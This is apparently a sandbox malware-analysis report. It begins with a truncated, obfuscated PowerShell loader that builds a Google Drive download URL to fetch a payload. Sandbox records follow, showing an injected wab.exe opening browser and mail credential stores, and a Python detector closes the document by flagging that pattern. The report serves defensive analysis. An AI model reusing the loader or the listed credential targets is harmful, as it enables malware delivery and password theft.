UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. 
';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. Kend Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 00000011.00000002.2432985015.0000000024B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
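The records above show a single process, the Windows Mail binary wab.exe (hosting the injected payload), opening the Chrome and Edge Login Data databases, the Firefox and Thunderbird profiles.ini files, the MAPI profile key and the IncrediMail identity key, and earlier reading HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid as a victim identifier. None of those stores belong to wab.exe. The following is an added detection example written for this report; it is not part of the Joe Sandbox output or of the malware. It reads a constructed JSON-lines export of file and registry access events (field names image, op, target are assumed; map them to your EDR or Sysmon schema), flags any process that is not the owning application touching a credential store, escalates to a harvesting verdict when one process sweeps stores from two or more applications, and notes whether the same process also read MachineGuid. The owner image lists, including incmail.exe for IncrediMail, are assumptions to tune for your environment.

```python
import fnmatch
import json
import ntpath
from collections import defaultdict

# Credential stores seen in the report, generalised to glob patterns.
# Second element: image names that legitimately own the store (assumed; tune).
# Patterns are matched case-insensitively; '*' also crosses path separators,
# so "Profile 1" directories match alongside "Default".
CREDENTIAL_STORES = {
    "chrome-logins":          (r"*\Google\Chrome\User Data\*\Login Data", {"chrome.exe"}),
    "edge-logins":            (r"*\Microsoft\Edge\User Data\*\Login Data", {"msedge.exe"}),
    "firefox-profiles":       (r"*\Mozilla\Firefox\profiles.ini", {"firefox.exe"}),
    "thunderbird-profiles":   (r"*\Thunderbird\profiles.ini", {"thunderbird.exe"}),
    "mapi-profiles":          (r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles*", {"outlook.exe"}),
    "incredimail-identities": (r"HKEY_CURRENT_USER\Software\IncrediMail\Identities*", {"incmail.exe"}),  # owner image assumed
}

# Host fingerprint the same process read in the report (used as a victim ID).
MACHINE_GUID = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid"


def classify(target):
    """Return the credential-store name a file or registry path belongs to, or None."""
    t = target.lower()
    for name, (pattern, _owners) in CREDENTIAL_STORES.items():
        if fnmatch.fnmatchcase(t, pattern.lower()):
            return name
    return None


def parse_log(text):
    """Parse a JSON-lines export into event dicts (constructed schema: image, op, target)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return one finding per process that touched credential stores it does not own."""
    touched = defaultdict(set)   # image path -> store names accessed by a non-owner
    fingerprinted = set()        # image paths that read MachineGuid
    for ev in events:
        image = ev["image"]
        exe = ntpath.basename(image).lower()
        target = ev["target"]
        if target.lower() == MACHINE_GUID.lower():
            fingerprinted.add(image)
            continue
        store = classify(target)
        if store is None:
            continue
        if exe not in CREDENTIAL_STORES[store][1]:
            touched[image].add(store)

    findings = []
    for image, stores in touched.items():
        # One store could be a backup tool or a migration helper; a sweep across
        # several applications from one process is the stealer pattern.
        applications = {s.split("-")[0] for s in stores}
        verdict = "credential-harvesting" if len(applications) >= 2 else "suspicious-access"
        findings.append({
            "image": image,
            "stores": sorted(stores),
            "verdict": verdict,
            "reads_machine_guid": image in fingerprinted,
        })
    return sorted(findings, key=lambda f: f["image"])


# Constructed sample log mirroring the report's records, plus benign owner
# accesses (chrome.exe, firefox.exe) and unrelated svchost.exe noise.
SAMPLE_LOG = r"""
{"image": "C:\\Windows\\System32\\svchost.exe", "op": "file_open", "target": "C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr.db"}
{"image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "op": "file_open", "target": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"}
{"image": "C:\\Program Files (x86)\\Windows Mail\\wab.exe", "op": "file_open", "target": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"}
{"image": "C:\\Program Files (x86)\\Windows Mail\\wab.exe", "op": "file_open", "target": "C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini"}
{"image": "C:\\Program Files (x86)\\Windows Mail\\wab.exe", "op": "file_open", "target": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data"}
{"image": "C:\\Program Files (x86)\\Windows Mail\\wab.exe", "op": "file_open", "target": "C:\\Users\\user\\AppData\\Roaming\\Thunderbird\\profiles.ini"}
{"image": "C:\\Program Files (x86)\\Windows Mail\\wab.exe", "op": "reg_open", "target": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles"}
{"image": "C:\\Program Files (x86)\\Windows Mail\\wab.exe", "op": "reg_open", "target": "HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities"}
{"image": "C:\\Program Files (x86)\\Windows Mail\\wab.exe", "op": "reg_query", "target": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid"}
{"image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "op": "file_open", "target": "C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini"}
"""

if __name__ == "__main__":
    for finding in detect(parse_log(SAMPLE_LOG)):
        print(json.dumps(finding, indent=2))
```

Run against the sample, only wab.exe is reported, with all six stores, the credential-harvesting verdict and reads_machine_guid set; chrome.exe and firefox.exe opening their own files produce nothing, and the svchost.exe BITS database access is ignored. A process that reads MachineGuid but no credential store is deliberately not reported on its own, since many legitimate components read that value.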